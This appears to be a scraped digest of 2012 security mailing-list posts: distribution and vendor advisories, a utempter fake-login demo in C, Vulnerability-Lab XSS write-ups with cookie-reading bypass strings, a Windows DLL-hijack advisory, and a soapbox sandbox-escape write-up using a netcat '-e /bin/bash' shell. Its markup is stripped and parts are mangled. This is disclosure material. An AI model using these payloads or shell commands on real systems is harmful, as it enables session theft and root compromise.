./PROBABLY_EXPLOITABLE/0x23420309.0x24367e2d/sf_9fdabc33e3fe46177504cbf7e566f65d-1225-0x05a52004-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x243f7e2d/sf_60fd4e31e7c1fda4c51c40a348c6da4b-75-0x0c9b9000-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x3c214a19/sf_2f3647f84b4baff07959929aa1c33a5c-424-0x-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x66274642/sf_6e55b1a0f2696a0bc4e80cbb468429f0-560-0x05b6000c-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x662b1d4e/sf_60fd4e31e7c1fda4c51c40a348c6da4b-1195-0x05a4-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x74000f4c/sf_c40aa52b109a96a511e9433d4ac56b51-853-0x0cd4b000-minimized.blend ./PROBABLY_EXPLOITABLE/0x23420309.0x74080f4c/sf_2f3647f84b4baff07959929aa1c33a5c-394-0x05813000-minimized.blend ./PROBABLY_EXPLOITABLE/0x24432e67.0x032d7039/sf_bbdbbb1315eed73948d9812aa075ac89-309-0x0598-minimized.blend ./PROBABLY_EXPLOITABLE/0x24432e67.0x03777039/sf_60fd4e31e7c1fda4c51c40a348c6da4b-337-0x0ca87000-minimized.blend ./PROBABLY_EXPLOITABLE/0x24432e67.0x6776414c/sf_fac171c436911fadb381eb2a9ef0760c-195-0x0cc27004-minimized.blend ./PROBABLY_EXPLOITABLE/0x43317564.0x06317564/sf_60fd4e31e7c1fda4c51c40a348c6da4b-48-0x-minimized.blend ./PROBABLY_EXPLOITABLE/0x492b4007.0x62223b6d/sf_c40aa52b109a96a511e9433d4ac56b51-172-0x-minimized.blend ./PROBABLY_EXPLOITABLE/0x655e6416.0x6c0f6a7a/sf_0378e695403019ae75f46c47a4d71299-1218-0x0305-minimized.blend ./PROBABLY_EXPLOITABLE/0x6607464c.0x43096734/sf_fac171c436911fadb381eb2a9ef0760c-908-0x1e24fffc-minimized.blend
[ MDVSA-2012:161 ] html2ps
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:161 http://www.mandriva.com/security/ ___ Package : html2ps Date: October 6, 2012 Affected: 2011. ___ Problem Description: A vulnerability has been found and corrected in html2ps: Directory traversal vulnerability in html2ps before 1.0b7 allows remote attackers to read arbitrary files via directory traversal sequences in SSI directives (CVE-2009-5067). The updated packages have been upgraded to the 1.0b7 version which is not affected by this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5067 ___ Updated Packages: Mandriva Linux 2011: a0ef74f6f963d98fc4305994bf810dbf 2011/i586/html2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm fc582a56f07cdce61aabec91ed261870 2011/i586/xhtml2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm 93aa1dc24c23c205360f5513816353d3 2011/SRPMS/html2ps-2.0-2.b7.0.1.src.rpm Mandriva Linux 2011/X86_64: 528aa56f1547da9a385cf1ef01445e73 2011/x86_64/html2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm 7c167fb40bc2655231eafe734c738a4d 2011/x86_64/xhtml2ps-2.0-2.b7.0.1-mdv2011.0.noarch.rpm 93aa1dc24c23c205360f5513816353d3 2011/SRPMS/html2ps-2.0-2.b7.0.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQb90WmqjQ0CJFipgRAqZxAKDoo7b1mmAMd/jwwKGCbYK0G8wkhgCdF8R/ E/ExUIDSWh+VeqW4s3in0+0= =4pmC -END PGP SIGNATURE-
utempter allows fake host setting
Quoting from
http://bugs.debian.org/689562
Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depend on utmp correctness.
Demo of the issue:
psz@bari:~$ cat silly.c
#include sys/types.h
#include sys/stat.h
#include fcntl.h
#include unistd.h
#include stdio.h
int main()
{
int i;
i = open(/dev/ptmx, O_RDWR);
printf(open ptmx returned %d\n, i);
dup2(i, 0);
/* dup2(i, 1); */
printf(doing utempter add\n);
system(/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0Jan 1
01:02 (xyz.com');
printf(checking who\n);
system(who | grep xyz);
printf(doing utempter del\n);
system(/usr/lib/utempter/utempter del);
printf(checking who\n);
system(who | grep xyz);
printf(DONE\n);
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz pts/29 Oct 4 11:48 (xyz)
r00t pts/0Jan 1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$
Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907
Cheers, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
[SECURITY] [DSA 2556-1] icedove security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2556-1 secur...@debian.org http://www.debian.org/security/Nico Golde October 07, 2012 http://www.debian.org/security/faq - - Package: icedove Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-1970 CVE-2012-1972 CVE-2012-1973 CVE-2012-1974 CVE-2012-1975 CVE-2012-1976 CVE-2012-3959 CVE-2012-3962 CVE-2012-3969 CVE-2012-3972 CVE-2012-3978 Several vulnerabilities were discovered in Icedove, Debian's version of the Mozilla Thunderbird mail and news client. This includes several instances of use-after-free and buffer overflow issues. The reported vulnerabilities could lead to the execution of arbitrary code, and additionally to the bypass of content-loading restrictions via the location object. For the stable distribution (squeeze), this problem has been fixed in version 3.0.11-1+squeeze13. For the testing distribution (wheezy), this problem has been fixed in version 10.0.7-1. For the unstable distribution (sid), this problem has been fixed in version 10.0.7-1. We recommend that you upgrade your icedove packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBxgBYACgkQHYflSXNkfP/atwCdHvj3GEdMpuKBnJBRMifhMN1x cAEAoKUEtqabMm9ZG+slbnGUCojje+4y =r4vj -END PGP SIGNATURE-
[SECURITY] [DSA 2557-1] hostapd security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2557-1 secur...@debian.org http://www.debian.org/security/Nico Golde October 08, 2012 http://www.debian.org/security/faq - - Package: hostapd Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2012-4445 Timo Warns discovered that the internal authentication server of hostapd, a user space IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP Authenticator, is vulnerable to a buffer overflow when processing fragmented EAP-TLS messages. As a result, an internal overflow checking routine terminates the process. An attacker can abuse this flaw to conduct denial of service attacks via crafted EAP-TLS messages prior to any authentication. For the stable distribution (squeeze), this problem has been fixed in version 0.6.10-2+squeeze1. For the testing (wheezy) and unstable (sid) distributions, this problem will be fixed soon. We recommend that you upgrade your hostapd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBykZ8ACgkQHYflSXNkfP8KMwCgrZevrVOPeI76Vm4q6LfvTMLi bJsAoKp8uuLyBRYI1JewUwPrWTFtdr3c =VOSf -END PGP SIGNATURE-
[PRE-SA-2012-07] hostapd: Missing EAP-TLS message length validation
PRE-CERT Security Advisory == * Advisory: PRE-SA-2012-07 * Released on: 8 October 2012 * Affected product: Hostapd 0.6 - 1.0 * Impact: denial of service * Origin: specially crafted EAP-TLS messages * CVSS Base Score: 7.8 Impact Subscore: 6.9 Exploitability Subscore: 10 CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:C) * Credit: Timo Warns (PRESENSE Technologies GmbH) * CVE Identifier: CVE-2012-4445 Summary --- The internal EAP authentication server of hostapd does not sufficiently validate the message length field of EAP-TLS messages, which can be exploited for a denial-of-service via specially crafted EAP-TLS messages (before authentication). Hostapd has a function eap_server_tls_process_fragment() used by its internal EAP authentication server for handling fragmented EAP-TLS messages. The function (indirectly) calls wpabuf_overflow() aborting the application in case of potential buffer overflows. Such a situation can be triggered by an attacker sending an EAP-TLS message with a) the More Fragments flag set and b) an TLS Message Length value that is smaller than the size of the TLS Data field. The vulnerability can be exploited only if hostapd is configured to use its internal EAP authentication server, either directly for IEEE 802.11x or when using hostapd as a RADIUS authentication server. Affected is hostapd in versions 0.6 - 1.0. The issue was introduced with commit http://hostap.epitest.fi/gitweb/gitweb.cgi?p=hostap.git;a=commitdiff;h=34f564dbd5168626da55a7119b04832e98793160 Solution A patch is available at http://w1.fi/gitweb/gitweb.cgi?p=hostap.git;a=commitdiff;h=586c446e0ff42ae00315b014924ec669023bd8de References -- When further information becomes available, this advisory will be updated. The most recent version of this advisory is available at: http://www.pre-cert.de/advisories/PRE-SA-2012-07.txt Contact PRE-CERT can be reached under prec...@pre-secure.de. For PGP key information, refer to http://www.pre-cert.de/.
Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites
Title: == Interspire Email Marketer v6.0.1 - Multiple Vulnerabilites Date: = 2012-10-02 References: === http://www.vulnerability-lab.com/get_content.php?id=710 VL-ID: = 710 Common Vulnerability Scoring System: 8.3 Introduction: = Our all-in-one email marketing software includes everything you need to create, send, track and profit from email marketing - but it doesn t stop there. It also includes powerful tools to completely automate your follow up marketing and customer feedback loops too: Follow up with prospects automatically using autoresponders. Send a series of personalized email messages to new leads at intervals you define. Its like having your own dedicated sales team working for you around the clock. Optimize your email click thru rates with split testing. Send a few variations of your email to a sample of your list and have the best performing one sent to the rest automatically. Automate your list management with triggers. Automatically convert leads to opportunities when they open a specific email, remove inactive leads from your list or even send a follow up email when a particular link is clicked - automatically. Keep your lists clean and up to date with automated bounce processing. Invalid email addresses can be removed from your list automatically based on smart bounce rules, helping keep your deliverability rate high. See the complete activity of a lead with event logging. Every time a lead opens your email, clicks a link or performs any other activity, its logged against their history making it easy for you sales team to qualify their desire to purchase. Solicit and track feedback with surveys. NEW! Using the drag drop editor you can create customized surveys and feedback forms which you can link to from your email campaigns or autoresponders and then blast to your list in minutes. (Copy of the Vendor Homepage: http://www.interspire.com/emailmarketer/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in Interspire Email Marketer 6.0.1, Email Marketing Software. Report-Timeline: 2012-10-02: Public or Non-Public Disclosure Status: Published Affected Products: == Interspire Product: Email Marketer v6.0.1 Exploitation-Technique: === Remote Severity: = Critical Details: 1.1 A SQL Injection vulnerability is detected in the Interspire Email Marketer v6.0.1, Email Marketing Software. The vulnerability allows an attacker (remote) or local low privileged user account to execute a SQL commands on the affected application dbms. The sql injection vulnerability is located in dynamiccontenttags file with the bound vulnerable id parameter. Successful exploitation of the vulnerability results in dbms application compromise. Exploitation requires no user interaction without privileged user account. Vulnerable File(s): [+] index.php Vulnerable Module(s): [+] ID Vulnerable Parameter(s): [+] dynamiccontenttags 1.2 Multiple persistent input validation vulnerabilities are detected in the Interspire Email Marketer v6.0.1, Email Marketing Software. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the user account, user groups, contacts, email campaigns or recent activity module with the bound vulnerable fullname, groupname, email, content block name and activitylog parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged web application user account. Vulnerable Module(s): [+] UsersGroups - Create a user account [+] UsersGroups - Create a user group [+] Contacts - Add contact [+] Email Campaigns - Dynamic Content Tags - Create a Dynamic Content Tag [+] Recent Activity Vulnerable Parameter(s): [+] Full Name [+] Group Name [+] Email Address [+] Content Block name [+] All recent activities get executed in the recent activity box 1.3 A non-persistent cross site scripting vulnerability is detected in the Interspire Email Marketer v6.0.1, Email Marketing Software. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The vulnerability is located in the dynamiccontenttags module with the bound vulnerable action parameter. Successful
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
Title: == GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities Date: = 2012-09-30 References: === http://www.vulnerability-lab.com/get_content.php?id=579 VL-ID: = 579 Common Vulnerability Scoring System: 4 Introduction: = The GTA family of Internet security firewall UTM systems has been expanded to include three new gigabit appliances. The GB-2500 Firewall UTM Appliance is one of GTA s most capable firewalls, designed for businesses with extensive network demands. Featuring a powerful Intel Dual-Core processor, two gigabits of RAM and four gigabits of static memory, the GB-2500 easily handles intensive, resource-demanding network configurations. The GB-2100 Firewall UTM Appliance provides robust protection and network reliability for SME organizations. Featuring flexible configuration options, straightforward implementation and uncomplicated maintenance and monitoring, the GB-2100 presents comprehensive protection that is adaptable to any network environment. The GB-820 Firewall UTM Appliance is designed for smaller offices, providing gigabit performance with all the features and tools available in larger appliances, but in a space-saving desktop unit. Built-in VPN acceleration provides the GB-820 with increased throughput, allowing organizations to easily handle periods of increased VPN activity. All GTA Firewall UTM Appliances include our advanced firewall features - policy based NAT, virtual hosting via IP Aliasing, advanced routing such as BGP and Single-Sign on authentication - at no extra charge. Threat management features include DoS and an Intrusion Prevention System (IPS), basic content filtering and advanced email gateway features. (Copy of the Vendor Homepage: http://www.gta.com ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web Vulnerabilities in the GTA UTM Firewall Firmware GB 6.0.3. Report-Timeline: 2012-05-20: Researcher Notification Coordination 2012-05-21: Vendor Notification 2012-06-04: Vendor Response/Feedback 2012-**-**: Vendor Fix/Patch 2012-10-01: Public or Non-Public Disclosure Status: Published Affected Products: == Global Technology Assiciates Inc Product: UTM Firewall Appliance Application vGB 6.0.3 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the GTA UTM Firewall Appliance Application Firmware GB 6.0.3. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The first vulnerability is located in the user remote password and pre-shared secret input fields user account output listing. The secound vulnerability is located in the VPN Certificate emailAddress subject with affect on the VPN Details Listing section. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin), persistent phishing stable (persistent) context manipulation in vulnerable modules or bound application sections. Exploitation requires low user inter action a privileged application account. Vulnerable Module(s): [+] Users - [Configure - Accounts - Users] - Remote Access L2TP / PPTP Remote Password [+] Users - [Configure - Accounts - Users] - Mobile IPSEC Modify ASCII Pre-shared Secret [+] VPN Certificate - Input Listing Picture(s): ../1.png ../2.png Video(s): ../gta-waf.wmv Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attackers with privileged user account low required user inter action. For demonstration or reproduce ... Note: To bypass the invalid argument filter exception use an onload iframe to request your external content with cookies. Standard frames and script tags with double quotes will be blocked by the invalid argument exception validation. To verify the bypass use also the wrong standard strings for the invalid argument validation. Locations: remotePW_hidden, identity, form input desc, fullName, Pre-shared Secret, emailAddress Good Example Bypass String: x src=http://www.vuln-lab.com onload=alert(GTA) or x src=http://www.vuln-lab.com onload=alert(document.cookie) Wrong Example Bypass String:iframe src=http://google.com or scriptalert(TEST)/script Review: Users - [Configure - Accounts - Users] - Remote Access L2TP / PPTP - Password input name=edit value=0 type=hiddeninput name=row value=0 type=hiddeninput id=objRows name=objRows value=1 type=hiddeninput id=saltedPW name=saltedPW value=$1$_J9..Zyn$m.. Jp/6/lNxwLbwRmteT11
Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities
Title: == Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities Date: = 2012-10-01 References: === http://www.vulnerability-lab.com/get_content.php?id=571 VL-ID: = 571 Common Vulnerability Scoring System: 5 Introduction: = Endpoint Protector 4 protect your network from the threats posed by portable storage devices. Portable devices such as USB flash drives and smartphones may cause severe issues when it comes to controlling data use within and outside the company. As a full DLP product, Endpoint Protector 4 prevents users from taking unauthorized data outside the company or bringing potential harmful files on USB devices, files which can have a significant impact on your network’s health. (Copy of the Vendor Homepage: http://www.endpointprotector.com/products/endpoint_protector ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Endpoint Protector v4.0.4.0 Appliance. Report-Timeline: 2012-05-13: Researcher Notification Coordination 2012-05-15: Vendor Notification 2012-05-20: Vendor Response/Feedback 2012-**-**: Vendor Fix/Patch 2012-10-01: Public or Non-Public Disclosure Status: Published Affected Products: == Endpoint Product: Protector v4.0.4.0 Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected in Endpoint Protector v4.0.4.0 Appliance Application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. The bug is located on the listing of the username description result pages. The bug affect all result listings inside of the application and all username and description input fields. Another issues is located in the Domain Controller Name of the Directory Service in the name, host + description of the department or snapshot configuration. Vulnerable Module(s): [+] Directory Service Active Directory Import, Active Directory Deployment AD Sync Domain Controller Server Name [+] EndPoint Management Users, Groups, Computers Devices Username, First Name, Last Name, Department, Phone E-mail [+] System Maintance System Snapshots List Available Snapshots Name Description [+] System Configuration System Departments Edit Department Name Description Proof of Concept: = The persistent vulnerabilities can be exploited by remote attacker with low privileged user account or via medium or high required user inter action. For demonstration or reproduce ... Review: Groups Management Listing tr class=sf_admin_row_0_hover style=border-left: 1px solid rgb(239, 239, 239); onmouseover=this.className='sf_admin_row_0_hover' onmouseout=this.className='sf_admin_row_0' onmouseup=whichButton(event, this, 'id', '4' );return false tdiframe src=Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-Dateien/a.htm onload='alert(VL)' = td= td[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!] /td tdTaylor /td tdDefault Department /td td /td td /td td13-May-2012 05:08:24 /td tddemo /td Review: User Management Listing tr class=sf_admin_row_1_hover style=border-left: 1px solid rgb(239, 239, 239); onmouseover=this.className='sf_admin_row_1_hover' onmouseout=this.className='sf_admin_row_1' onmouseup=whichButton(event, this, 'id', '4' );return false tdbla /td tdiframe src=Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-2-Dateien/index.htm /td td[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!] /td tdDefault Department /td td /td td /td td13-May-2012 05:19:02 /td tdtest /td td Review: Active Directory Import - Domain Controller Name div id=ext-genlist4 class=x-panel-bwrap div class=x-panel-ml div class=x-panel-mr div class=x-panel-mc div style=width: 100%;height:300px id=ext-genlist5 class=x-panel-body div style=height:270px;display:block align=left div class=form-row label for=active_directory_server_name style=width: 250pxDomain Controller Server Name:/label div class=content input name=active_directory[domaincontroller] type=textiframe src=Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-6-[PERSISTENT SCRIPT CODE CONTEXT
[SECURITY] [DSA 2558-1] bacula security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2558-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert October 08, 2012 http://www.debian.org/security/faq - - Package: bacula Vulnerability : information disclosure Problem type : local (remote) Debian-specific: no CVE ID : CVE-2012-4430 It was discovered that bacula, a network backup service, does not properly enforce console ACLs. This could allow information about resources to be dumped by an otherwise-restricted client. For the stable distribution (squeeze), this problem has been fixed in version 5.0.2-2.2+squeeze1. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 5.2.6+dfsg-4. We recommend that you upgrade your bacula packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBy7koACgkQYy49rUbZzlqFAgCfSghGpcJLbh5vwt37gaZxTSuR V24An36o7E9NQuuPzYBCSevdEFWCrZud =DEqg -END PGP SIGNATURE-
[security bulletin] HPSBOV02822 SSRT100966 rev.1 - HP Secure Web Server (SWS) for OpenVMS, Remote Denial of Service (DoS), Unauthorized Access, Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03517954 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03517954 Version: 1 HPSBOV02822 SSRT100966 rev.1 - HP Secure Web Server (SWS) for OpenVMS, Remote Denial of Service (DoS), Unauthorized Access, Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-10-08 Last Updated: 2012-10-08 Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP Secure Web Server (SWS) for OpenVMS. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS), unauthorized access, or unauthorized disclosure of information. References: CVE-2011-0419, CVE-2011-1928, CVE-2011-3192, CVE-2011-3368, CVE-2011-3607, CVE-2011-4317, CVE-2012-0031 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Secure Web Server (SWS) for OpenVMS V2.2 and earlier. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-0419(AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1928(AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-3192(AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2011-3368(AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3607(AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-4317(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2012-0031(AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following software update available to resolve these vulnerabilities. HP Secure Web Server (SWS) for OpenVMS V2.2 Update 2 is available at http://h71000.www7.hp.com/openvms/products/ips/apache/csws_patches.html for the following platforms: Platform Kit Name OpenVMS Integrity servers HP-I64VMS-CSWS22_UPDATE-V0200--4.PCSI_SFX_I64EXE OpenVMS Alpha servers CPQ-AXPVMS-CSWS22_UPDATE-V0200--4.PCSI_SFX_AXPEXE HISTORY Version:1 (rev.1) - 8 October 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBzDiMACgkQ4B86/C0qfVn4CQCgwYRZZOUW3QOe8sH+dY5X28GO
Privilege Escalation Vulnerability in Microsoft Windows
Advisory ID: HTB23108 Product: Microsoft Windows Vendor: Microsoft Corporation Vulnerable Version(s): Windows Vista, Windows Server 2008, Windows 7, Windows 8 RP Tested Version: Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 Professional SP1, Windows 8 RP Vendor Notification: August 7, 2012 Public Disclosure: October 9, 2012 Vulnerability Type: Uncontrolled Search Path Element [CWE-427] CVSSv2 Base Score: 6 (AV:L/AC:H/Au:S/C:C/I:C/A:C) Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab has discovered a vulnerability in Microsoft Windows which could be exploited to escalate privileges under certain conditions. The vulnerability exists due to the “IKE and AuthIP IPsec Keying Modules” system service, which tries to load the “wlbsctrl.dll” DLL that is missing after default Windows installation. The “IKE and AuthIP IPsec Keying Modules” service starts automatically in default configuration (after default installation) of: - Microsoft Windows Vista - Microsoft Windows 2008 - Microsoft Windows 7 - Microsoft Windows 8 Release Preview Moreover the service runs with SYSTEM privileges by default. Therefore an unprivileged local user who has write access to a default or any other search PATH locations can execute arbitrary code on the vulnerable system with the privileges of the SYSTEM account. Vulnerability Details The “IKE and AuthIP IPsec Keying Modules” service tries to loads the “wlbsctrl.dll” library which is missing. This forces Microsoft Windows to use search PATH procedure to locate the missing dynamic-link file in the following order described by Microsoft - http://msdn.microsoft.com/en-us/library/windows/desktop/ff919712%28v=vs.85%29.aspx - The directory from which the application loaded - The system directory - The 16-bit system directory - The Windows directory - The current directory - The directories that are listed in the PATH environment variable When directory is created in the C:\ root folder, access permissions for files and subfolders are inherited from the parent directory. By default members of the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA privileges to all directories created within the C:\ root folder. This also applies to folders created by application's installer. The vulnerability is introduced to the system when software does not change default permissions to installation directory and adds its installation path to the PATH system environment variable. Any member of the Authenticated users group can place malicious file named “wlbsctrl.dll” into that folder and execute arbitrary code on the system after simple reboot. A brief research confirmed that the following well-known software makes the weakness exploitable when installed into the C:\ root folder: - ActivePerl 5.16.1.1601 (default installation) Adds to the PATH variable: C:\Perl\Site\bin; - ActiveTcl 8.5.12 (default installation) Adds to the PATH variable: C:\TD\bin - ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but can be manually activated) Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts; - Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, but can be manually activated) Adds to the PATH variable: C:\Ruby193\bin; - PHP 5.3.17 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\PHP) Adds to the PATH variable: C:\PHP\; - Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C root folder, e.g. C:\Zend) Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin - MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\MySQL) Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin Attack vectors Any member of the Authenticated Users group can escalate his privileges to SYSTEM when the following conditions are met: 1. The above-mentioned software sets insecure privileges for installation folder (that is writable by members of the Authenticated Users group). 2. The above-mentioned software adds its installation path to the system PATH environment variable. Proof of Concept You can download the PoC (Proof of Concept) that demonstrates vulnerability exploitation under non-privileged user account on default installation of Windows 7 with default installation of the latest version of ActivePerl: https://www.htbridge.com/advisory/HTB23108-P0c-Windows-Services.rar How to exploit: 1. Log in under an unprivileged system account. 2. Download and extract the HTB23108-P0c-Windows-Services.rar archive. 3. Copy
soapbox Local Root / Privilege Escalation Vulnerability
--- soapbox 0.3.1 = Local Root Exploit --- Vendor URI: http://dag.wieers.com/home-made/soapbox/ Credit: Jean Pascal Pereira pere...@secbiz.de Description: Soapbox allows to restrict processes to write only to those places you want. Read-access however is still based on file-permissions. By preloading the Soapbox library, you can run programs as root and monitor which writes/changes are made, without them really happening. (Typically 'make install') Beware this can be used for security-purposes, but it can deliberately be circumvented. Soapbox only impacts dynamically linked programs that properly use glibc functions. I'm currently looking into a safer implementation using ptrace. Soapbox also triggered some bugs in applications that trusted system calls too much. So you can use soapbox to test your programs for these kinds of mistakes too. -- First of all, we have to run soapbox on our target system. I'm going to create a new netcat process spawned in a restricted directory (/etc/opt/sbx). -- root@havoc:/etc/opt/sbx# soapbox -l log -p /etc/opt/sbx /bin/nc -l -v -p 4545 -e /bin/bash -- After establishing a connection to our target system, we get a sandboxed root shell. Let's try to write data to a protected location. -- $ nc 23.5.0.0 4545 echo boom /etc/abc bash: line 1: 1: Bad file descriptor -- As we can see, soapbox restricts write access to this path. But what happens if we start another soapbox instance with full file-system access? -- $ nc 23.5.0.0 4545 soapbox -l log -p / /bin/bash # running another instance of soapbox that provides full file system access echo boom /etc/abc cat 